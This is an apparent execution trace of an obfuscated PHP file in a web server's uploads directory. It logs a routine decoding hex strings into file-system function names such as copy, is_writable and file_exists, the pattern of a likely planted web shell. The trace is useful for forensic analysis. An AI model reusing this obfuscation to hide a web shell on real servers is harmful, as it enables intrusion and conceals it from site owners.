3	75	1	0.003224	480440
3	75	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	76	0	0.003253	480432	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	76	1	0.003265	480480
3	76	R			101
3	77	0	0.003277	480400	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	77	1	0.003288	480440
3	77	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	78	0	0.003318	480432	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'67'
3	78	1	0.003329	480480
3	78	R			103
3	79	0	0.003341	480400	chr	0		/var/www/html/uploads/galaxy.php	25	1	103
3	79	1	0.003352	480440
3	79	R			'g'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'g'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	80	0	0.003382	480432	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	80	1	0.003393	480480
3	80	R			95
3	81	0	0.003405	480400	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	81	1	0.003416	480440
3	81	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	82	0	0.003446	480432	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	82	1	0.003457	480480
3	82	R			115
3	83	0	0.003469	480400	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	83	1	0.003481	480440
3	83	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	84	0	0.003510	480432	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'70'
3	84	1	0.003521	480480
3	84	R			112
3	85	0	0.003533	480400	chr	0		/var/www/html/uploads/galaxy.php	25	1	112
3	85	1	0.003544	480440
3	85	R			'p'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'p'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	86	0	0.003577	480432	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	86	1	0.003588	480480
3	86	R			108
3	87	0	0.003600	480400	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	87	1	0.003612	480440
3	87	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	88	0	0.003641	480440	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	88	1	0.003652	480488
3	88	R			105
3	89	0	0.003664	480408	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	89	1	0.003675	480448
3	89	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	90	0	0.003704	480440	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	90	1	0.003716	480488
3	90	R			116
3	91	0	0.003728	480408	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	91	1	0.003739	480448
3	91	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	71	1	0.003767	480408
2	71	R			'preg_split'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[4] = 'preg_split'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	92	0	0.003801	480408	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'61727261795f64696666'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 19
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	93	0	0.003841	480440	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'61'
3	93	1	0.003852	480488
3	93	R			97
3	94	0	0.003864	480408	chr	0		/var/www/html/uploads/galaxy.php	25	1	97
3	94	1	0.003875	480448
3	94	R			'a'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'a'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	95	0	0.003904	480472	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	95	1	0.003916	480520
3	95	R			114
3	96	0	0.003928	480440	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	96	1	0.003939	480480
3	96	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	97	0	0.003968	480472	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	97	1	0.003980	480520
3	97	R			114
3	98	0	0.003992	480440	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	98	1	0.004003	480480
3	98	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	99	0	0.004031	480472	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'61'
3	99	1	0.004043	480520
3	99	R			97
3	100	0	0.004055	480440	chr	0		/var/www/html/uploads/galaxy.php	25	1	97
3	100	1	0.004067	480480
3	100	R			'a'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'a'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	101	0	0.004096	480472	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'79'
3	101	1	0.004107	480520
3	101	R			121
3	102	0	0.004119	480440	chr	0		/var/www/html/uploads/galaxy.php	25	1	121
3	102	1	0.004130	480480
3	102	R			'y'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'y'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	103	0	0.004160	480472	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	103	1	0.004171	480520
3	103	R			95
3	104	0	0.004183	480440	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	104	1	0.004194	480480
3	104	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	105	0	0.004224	480472	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'64'
3	105	1	0.004235	480520
3	105	R			100
3	106	0	0.004248	480440	chr	0		/var/www/html/uploads/galaxy.php	25	1	100
3	106	1	0.004259	480480
3	106	R			'd'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'd'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	107	0	0.004291	480472	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	107	1	0.004303	480520
3	107	R			105
3	108	0	0.004315	480440	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	108	1	0.004326	480480
3	108	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	109	0	0.004355	480480	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'66'
3	109	1	0.004367	480528
3	109	R			102
3	110	0	0.004379	480448	chr	0		/var/www/html/uploads/galaxy.php	25	1	102
3	110	1	0.004390	480488
3	110	R			'f'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'f'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	111	0	0.004419	480480	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'66'
3	111	1	0.004431	480528
3	111	R			102
3	112	0	0.004443	480448	chr	0		/var/www/html/uploads/galaxy.php	25	1	102
3	112	1	0.004454	480488
3	112	R			'f'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'f'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	92	1	0.004483	480448
2	92	R			'array_diff'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[5] = 'array_diff'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	113	0	0.004516	480448	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'69735f646972'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 11
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	114	0	0.004556	480480	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	114	1	0.004567	480528
3	114	R			105
3	115	0	0.004579	480448	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	115	1	0.004590	480488
3	115	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	116	0	0.004620	480512	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	116	1	0.004631	480560
3	116	R			115
3	117	0	0.004644	480480	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	117	1	0.004654	480520
3	117	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	118	0	0.004684	480512	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	118	1	0.004696	480560
3	118	R			95
3	119	0	0.004707	480480	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	119	1	0.004719	480520
3	119	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	120	0	0.004748	480512	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'64'
3	120	1	0.004760	480560
3	120	R			100
3	121	0	0.004772	480480	chr	0		/var/www/html/uploads/galaxy.php	25	1	100
3	121	1	0.004783	480520
3	121	R			'd'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'd'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	122	0	0.004813	480512	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	122	1	0.004824	480560
3	122	R			105
3	123	0	0.004836	480480	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	123	1	0.004847	480520
3	123	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	124	0	0.004891	480512	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	124	1	0.004945	480560
3	124	R			114
3	125	0	0.004959	480480	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	125	1	0.004970	480520
3	125	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	113	1	0.005000	480480
2	113	R			'is_dir'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[6] = 'is_dir'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	126	0	0.005033	480480	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'69735f66696c65'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 13
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	127	0	0.005079	480512	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	127	1	0.005091	480560
3	127	R			105
3	128	0	0.005104	480480	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	128	1	0.005115	480520
3	128	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	129	0	0.005145	480544	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	129	1	0.005156	480592
3	129	R			115
3	130	0	0.005169	480512	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	130	1	0.005179	480552
3	130	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	131	0	0.005209	480544	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	131	1	0.005220	480592
3	131	R			95
3	132	0	0.005232	480512	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	132	1	0.005244	480552
3	132	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	133	0	0.005273	480544	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'66'
3	133	1	0.005285	480592
3	133	R			102
3	134	0	0.005297	480512	chr	0		/var/www/html/uploads/galaxy.php	25	1	102
3	134	1	0.005308	480552
3	134	R			'f'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'f'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	135	0	0.005345	480544	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	135	1	0.005357	480592
3	135	R			105
3	136	0	0.005369	480512	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	136	1	0.005380	480552
3	136	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	137	0	0.005409	480544	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	137	1	0.005421	480592
3	137	R			108
3	138	0	0.005433	480512	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	138	1	0.005444	480552
3	138	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	139	0	0.005473	480544	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	139	1	0.005484	480592
3	139	R			101
3	140	0	0.005496	480512	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	140	1	0.005507	480552
3	140	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	126	1	0.005537	480512
2	126	R			'is_file'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[7] = 'is_file'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	141	0	0.005570	480512	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'69735f7772697461626c65'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 21
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	142	0	0.005611	480544	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	142	1	0.005623	480592
3	142	R			105
3	143	0	0.005635	480512	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	143	1	0.005646	480552
3	143	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	144	0	0.005675	480576	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	144	1	0.005687	480624
3	144	R			115
3	145	0	0.005699	480544	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	145	1	0.005710	480584
3	145	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	146	0	0.005740	480576	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	146	1	0.005752	480624
3	146	R			95
3	147	0	0.005764	480544	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	147	1	0.005778	480584
3	147	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	148	0	0.005808	480576	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'77'
3	148	1	0.005819	480624
3	148	R			119
3	149	0	0.005832	480544	chr	0		/var/www/html/uploads/galaxy.php	25	1	119
3	149	1	0.005843	480584
3	149	R			'w'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'w'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	150	0	0.005872	480576	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	150	1	0.005884	480624
3	150	R			114
3	151	0	0.005896	480544	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	151	1	0.005907	480584
3	151	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	152	0	0.005936	480576	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	152	1	0.005948	480624
3	152	R			105
3	153	0	0.005960	480544	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	153	1	0.005971	480584
3	153	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	154	0	0.006000	480576	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	154	1	0.006012	480624
3	154	R			116
3	155	0	0.006023	480544	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	155	1	0.006034	480584
3	155	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	156	0	0.006063	480576	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'61'
3	156	1	0.006075	480624
3	156	R			97
3	157	0	0.006087	480544	chr	0		/var/www/html/uploads/galaxy.php	25	1	97
3	157	1	0.006098	480584
3	157	R			'a'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'a'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	158	0	0.006128	480584	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'62'
3	158	1	0.006139	480632
3	158	R			98
3	159	0	0.006151	480552	chr	0		/var/www/html/uploads/galaxy.php	25	1	98
3	159	1	0.006162	480592
3	159	R			'b'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'b'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	160	0	0.006191	480584	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	160	1	0.006204	480632
3	160	R			108
3	161	0	0.006216	480552	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	161	1	0.006227	480592
3	161	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	162	0	0.006256	480584	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	162	1	0.006268	480632
3	162	R			101
3	163	0	0.006280	480552	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	163	1	0.006291	480592
3	163	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	141	1	0.006320	480552
2	141	R			'is_writable'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[8] = 'is_writable'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	164	0	0.006353	480552	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'69735f7265616461626c65'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 21
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	165	0	0.006394	480584	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	165	1	0.006406	480632
3	165	R			105
3	166	0	0.006418	480552	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	166	1	0.006429	480592
3	166	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	167	0	0.006459	480616	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	167	1	0.006471	480664
3	167	R			115
3	168	0	0.006483	480584	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	168	1	0.006497	480624
3	168	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	169	0	0.006528	480616	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	169	1	0.006540	480664
3	169	R			95
3	170	0	0.006552	480584	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	170	1	0.006563	480624
3	170	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	171	0	0.006593	480616	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	171	1	0.006605	480664
3	171	R			114
3	172	0	0.006617	480584	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	172	1	0.006628	480624
3	172	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	173	0	0.006657	480616	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	173	1	0.006669	480664
3	173	R			101
3	174	0	0.006681	480584	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	174	1	0.006692	480624
3	174	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	175	0	0.006722	480616	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'61'
3	175	1	0.006733	480664
3	175	R			97
3	176	0	0.006745	480584	chr	0		/var/www/html/uploads/galaxy.php	25	1	97
3	176	1	0.006756	480624
3	176	R			'a'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'a'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	177	0	0.006785	480616	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'64'
3	177	1	0.006801	480664
3	177	R			100
3	178	0	0.006814	480584	chr	0		/var/www/html/uploads/galaxy.php	25	1	100
3	178	1	0.006825	480624
3	178	R			'd'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'd'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	179	0	0.006855	480616	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'61'
3	179	1	0.006866	480664
3	179	R			97
3	180	0	0.006879	480584	chr	0		/var/www/html/uploads/galaxy.php	25	1	97
3	180	1	0.006890	480624
3	180	R			'a'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'a'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	181	0	0.006919	480624	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'62'
3	181	1	0.006930	480672
3	181	R			98
3	182	0	0.006943	480592	chr	0		/var/www/html/uploads/galaxy.php	25	1	98
3	182	1	0.006954	480632
3	182	R			'b'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'b'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	183	0	0.006983	480624	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	183	1	0.006995	480672
3	183	R			108
3	184	0	0.007007	480592	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	184	1	0.007018	480632
3	184	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	185	0	0.007047	480624	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	185	1	0.007059	480672
3	185	R			101
3	186	0	0.007071	480592	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	186	1	0.007082	480632
3	186	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	164	1	0.007111	480592
2	164	R			'is_readable'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[9] = 'is_readable'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	187	0	0.007145	480592	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'66696c6573697a65'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 15
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	188	0	0.007185	480624	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'66'
3	188	1	0.007197	480672
3	188	R			102
3	189	0	0.007213	480592	chr	0		/var/www/html/uploads/galaxy.php	25	1	102
3	189	1	0.007224	480632
3	189	R			'f'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'f'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	190	0	0.007253	480656	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	190	1	0.007265	480704
3	190	R			105
3	191	0	0.007278	480624	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	191	1	0.007289	480664
3	191	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	192	0	0.007318	480656	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	192	1	0.007330	480704
3	192	R			108
3	193	0	0.007342	480624	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	193	1	0.007353	480664
3	193	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	194	0	0.007383	480656	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	194	1	0.007394	480704
3	194	R			101
3	195	0	0.007407	480624	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	195	1	0.007418	480664
3	195	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	196	0	0.007447	480656	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	196	1	0.007459	480704
3	196	R			115
3	197	0	0.007471	480624	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	197	1	0.007481	480664
3	197	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	198	0	0.007511	480656	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	198	1	0.007522	480704
3	198	R			105
3	199	0	0.007534	480624	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	199	1	0.007546	480664
3	199	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	200	0	0.007574	480656	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'7a'
3	200	1	0.007586	480704
3	200	R			122
3	201	0	0.007599	480624	chr	0		/var/www/html/uploads/galaxy.php	25	1	122
3	201	1	0.007609	480664
3	201	R			'z'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'z'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	202	0	0.007639	480656	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	202	1	0.007650	480704
3	202	R			101
3	203	0	0.007662	480624	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	203	1	0.007673	480664
3	203	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	187	1	0.007703	480632
2	187	R			'filesize'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[10] = 'filesize'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	204	0	0.007737	480632	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'636f7079'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 7
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	205	0	0.007776	480664	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'63'
3	205	1	0.007788	480712
3	205	R			99
3	206	0	0.007800	480632	chr	0		/var/www/html/uploads/galaxy.php	25	1	99
3	206	1	0.007811	480672
3	206	R			'c'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'c'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	207	0	0.007841	480696	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6f'
3	207	1	0.007853	480744
3	207	R			111
3	208	0	0.007865	480664	chr	0		/var/www/html/uploads/galaxy.php	25	1	111
3	208	1	0.007876	480704
3	208	R			'o'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'o'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	209	0	0.007905	480696	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'70'
3	209	1	0.007921	480744
3	209	R			112
3	210	0	0.007933	480664	chr	0		/var/www/html/uploads/galaxy.php	25	1	112
3	210	1	0.007944	480704
3	210	R			'p'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'p'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	211	0	0.007974	480696	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'79'
3	211	1	0.007985	480744
3	211	R			121
3	212	0	0.007997	480664	chr	0		/var/www/html/uploads/galaxy.php	25	1	121
3	212	1	0.008008	480704
3	212	R			'y'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'y'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	204	1	0.008038	480664
2	204	R			'copy'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[11] = 'copy'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	213	0	0.008070	480664	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'66696c655f657869737473'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 21
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	214	0	0.008110	480696	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'66'
3	214	1	0.008122	480744
3	214	R			102
